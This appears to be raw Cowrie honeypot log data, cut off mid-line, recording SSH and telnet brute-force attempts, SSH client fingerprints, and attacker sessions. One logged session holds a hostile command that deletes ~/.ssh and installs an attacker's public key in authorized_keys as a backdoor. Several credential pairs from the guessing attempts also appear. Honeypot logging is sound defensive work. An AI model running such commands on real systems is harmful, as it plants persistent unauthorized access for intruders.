{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:12:42.068115Z","src_ip":"212.227.235.229","session":"ef8e4327e284"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34693,"dst_ip":"1.2.3.4","dst_port":23,"session":"5ea195936d06","protocol":"telnet","message":"New connection: 212.227.125.160:34693 (1.2.3.4:23) [session: 5ea195936d06]","sensor":"my-vps","timestamp":"2025-08-26T05:13:41.196723Z"}
{"eventid":"cowrie.session.connect","src_ip":"79.127.48.196","src_port":59824,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f338f556816","protocol":"ssh","message":"New connection: 79.127.48.196:59824 (1.2.3.4:22) [session: 4f338f556816]","sensor":"my-vps","timestamp":"2025-08-26T05:13:52.893857Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:13:52.994792Z","src_ip":"79.127.48.196","session":"4f338f556816"}
{"eventid":"cowrie.session.closed","duration":31.19569706916809,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:14:12.392343Z","src_ip":"212.227.125.160","session":"5ea195936d06"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":47534,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f5728436cd6","protocol":"ssh","message":"New connection: 45.88.8.215:47534 (1.2.3.4:22) [session: 7f5728436cd6]","sensor":"my-vps","timestamp":"2025-08-26T05:14:14.350297Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:14:14.652405Z","src_ip":"45.88.8.215","session":"7f5728436cd6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T05:14:14.653087Z","src_ip":"45.88.8.215","session":"7f5728436cd6"}
{"eventid":"cowrie.login.success","username":"root","password":"Kovidh@123","message":"login attempt [root/Kovidh@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:14:16.134564Z","src_ip":"45.88.8.215","session":"7f5728436cd6"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:14:16.483546Z","src_ip":"45.88.8.215","session":"7f5728436cd6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":24526,"dst_ip":"1.2.3.4","dst_port":22,"session":"f364e5e30fbb","protocol":"ssh","message":"New connection: 212.227.235.229:24526 (1.2.3.4:22) [session: f364e5e30fbb]","sensor":"my-vps","timestamp":"2025-08-26T05:16:11.265488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T05:16:11.266648Z","src_ip":"212.227.235.229","session":"f364e5e30fbb"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T05:16:11.373459Z","src_ip":"212.227.235.229","session":"f364e5e30fbb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"terrence","message":"login attempt [admin/terrence] failed","sensor":"my-vps","timestamp":"2025-08-26T05:16:11.845426Z","src_ip":"212.227.235.229","session":"f364e5e30fbb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"terrance","message":"login attempt [admin/terrance] failed","sensor":"my-vps","timestamp":"2025-08-26T05:16:12.956261Z","src_ip":"212.227.235.229","session":"f364e5e30fbb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"taytay","message":"login attempt [admin/taytay] failed","sensor":"my-vps","timestamp":"2025-08-26T05:16:14.065972Z","src_ip":"212.227.235.229","session":"f364e5e30fbb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"system1","message":"login attempt [admin/system1] failed","sensor":"my-vps","timestamp":"2025-08-26T05:16:15.175600Z","src_ip":"212.227.235.229","session":"f364e5e30fbb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"sunbeam","message":"login attempt [admin/sunbeam] failed","sensor":"my-vps","timestamp":"2025-08-26T05:16:16.285541Z","src_ip":"212.227.235.229","session":"f364e5e30fbb"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:16:17.395545Z","src_ip":"212.227.235.229","session":"f364e5e30fbb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44834,"dst_ip":"1.2.3.4","dst_port":22,"session":"0865095a6b94","protocol":"ssh","message":"New connection: 212.227.235.229:44834 (1.2.3.4:22) [session: 0865095a6b94]","sensor":"my-vps","timestamp":"2025-08-26T05:16:41.797145Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:16:41.798340Z","src_ip":"212.227.235.229","session":"0865095a6b94"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:16:42.069354Z","src_ip":"212.227.235.229","session":"0865095a6b94"}
{"eventid":"cowrie.login.success","username":"root","password":"Dc123456","message":"login attempt [root/Dc123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:16:43.189176Z","src_ip":"212.227.235.229","session":"0865095a6b94"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:16:43.755209Z","src_ip":"212.227.235.229","session":"0865095a6b94"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:16:43.755974Z","src_ip":"212.227.235.229","session":"0865095a6b94"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:16:43.757255Z","src_ip":"212.227.235.229","session":"0865095a6b94"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:16:44.028339Z","src_ip":"212.227.235.229","session":"0865095a6b94"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:16:44.665962Z","src_ip":"212.227.235.229","session":"0865095a6b94"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T05:16:44.666740Z","src_ip":"212.227.235.229","session":"0865095a6b94"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T05:16:44.938427Z","src_ip":"212.227.235.229","session":"0865095a6b94"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:16:44.939509Z","src_ip":"212.227.235.229","session":"0865095a6b94"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45578,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b7d92ba1d22","protocol":"ssh","message":"New connection: 212.227.235.229:45578 (1.2.3.4:22) [session: 3b7d92ba1d22]","sensor":"my-vps","timestamp":"2025-08-26T05:16:45.213999Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:16:45.214693Z","src_ip":"212.227.235.229","session":"3b7d92ba1d22"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:16:45.484482Z","src_ip":"212.227.235.229","session":"3b7d92ba1d22"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T05:16:46.600077Z","src_ip":"212.227.235.229","session":"3b7d92ba1d22"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:16:47.870886Z","src_ip":"212.227.235.229","session":"3b7d92ba1d22"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46280,"dst_ip":"1.2.3.4","dst_port":22,"session":"26baac44c922","protocol":"ssh","message":"New connection: 212.227.235.229:46280 (1.2.3.4:22) [session: 26baac44c922]","sensor":"my-vps","timestamp":"2025-08-26T05:16:48.132578Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:16:48.133320Z","src_ip":"212.227.235.229","session":"26baac44c922"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:16:48.397043Z","src_ip":"212.227.235.229","session":"26baac44c922"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:16:49.487024Z","src_ip":"212.227.235.229","session":"26baac44c922"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:16:49.748144Z","src_ip":"212.227.235.229","session":"0865095a6b94"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:16:49.751127Z","src_ip":"212.227.235.229","session":"26baac44c922"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42688,"dst_ip":"1.2.3.4","dst_port":22,"session":"af6cec29b3b1","protocol":"ssh","message":"New connection: 212.227.235.229:42688 (1.2.3.4:22) [session: af6cec29b3b1]","sensor":"my-vps","timestamp":"2025-08-26T05:17:07.788113Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:17:08.461549Z","src_ip":"212.227.235.229","session":"af6cec29b3b1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T05:17:08.462297Z","src_ip":"212.227.235.229","session":"af6cec29b3b1"}
{"eventid":"cowrie.login.success","username":"root","password":"best@1@1","message":"login attempt [root/best@1@1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:17:13.081665Z","src_ip":"212.227.235.229","session":"af6cec29b3b1"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:17:14.040351Z","src_ip":"212.227.235.229","session":"af6cec29b3b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57243,"dst_ip":"1.2.3.4","dst_port":23,"session":"c77fb2560413","protocol":"telnet","message":"New connection: 212.227.235.229:57243 (1.2.3.4:23) [session: c77fb2560413]","sensor":"my-vps","timestamp":"2025-08-26T05:18:16.736450Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59394,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bbae722bb10","protocol":"ssh","message":"New connection: 217.72.205.35:59394 (1.2.3.4:22) [session: 4bbae722bb10]","sensor":"my-vps","timestamp":"2025-08-26T05:18:34.868630Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:18:34.869815Z","src_ip":"217.72.205.35","session":"4bbae722bb10"}
{"eventid":"cowrie.session.closed","duration":31.584508657455444,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:18:48.320893Z","src_ip":"212.227.235.229","session":"c77fb2560413"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64628,"dst_ip":"1.2.3.4","dst_port":23,"session":"83bcd5fd92f6","protocol":"telnet","message":"New connection: 212.227.235.229:64628 (1.2.3.4:23) [session: 83bcd5fd92f6]","sensor":"my-vps","timestamp":"2025-08-26T05:19:28.281440Z"}
{"eventid":"cowrie.session.closed","duration":9.912173748016357,"message":"Connection lost after 9 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:19:38.193533Z","src_ip":"212.227.235.229","session":"83bcd5fd92f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57989,"dst_ip":"1.2.3.4","dst_port":23,"session":"a1f637ed8462","protocol":"telnet","message":"New connection: 212.227.125.160:57989 (1.2.3.4:23) [session: a1f637ed8462]","sensor":"my-vps","timestamp":"2025-08-26T05:20:46.148913Z"}
{"eventid":"cowrie.session.closed","duration":12.989683866500854,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:20:59.138499Z","src_ip":"212.227.125.160","session":"a1f637ed8462"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42875,"dst_ip":"1.2.3.4","dst_port":23,"session":"b96c8b08b824","protocol":"telnet","message":"New connection: 212.227.235.229:42875 (1.2.3.4:23) [session: b96c8b08b824]","sensor":"my-vps","timestamp":"2025-08-26T05:21:12.847862Z"}
{"eventid":"cowrie.session.closed","duration":31.366848468780518,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:21:44.214641Z","src_ip":"212.227.235.229","session":"b96c8b08b824"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52344,"dst_ip":"1.2.3.4","dst_port":23,"session":"525bec761a77","protocol":"telnet","message":"New connection: 212.227.125.160:52344 (1.2.3.4:23) [session: 525bec761a77]","sensor":"my-vps","timestamp":"2025-08-26T05:21:45.162272Z"}
{"eventid":"cowrie.session.closed","duration":12.649850606918335,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:21:57.812045Z","src_ip":"212.227.125.160","session":"525bec761a77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57873,"dst_ip":"1.2.3.4","dst_port":23,"session":"d49be3570895","protocol":"telnet","message":"New connection: 212.227.125.160:57873 (1.2.3.4:23) [session: d49be3570895]","sensor":"my-vps","timestamp":"2025-08-26T05:23:50.496375Z"}
{"eventid":"cowrie.session.closed","duration":30.47408890724182,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:24:20.970395Z","src_ip":"212.227.125.160","session":"d49be3570895"}
{"eventid":"cowrie.session.connect","src_ip":"194.0.234.21","src_port":60906,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b894c617c73","protocol":"ssh","message":"New connection: 194.0.234.21:60906 (1.2.3.4:22) [session: 9b894c617c73]","sensor":"my-vps","timestamp":"2025-08-26T05:24:54.883402Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-26T05:24:54.885657Z","src_ip":"194.0.234.21","session":"9b894c617c73"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed2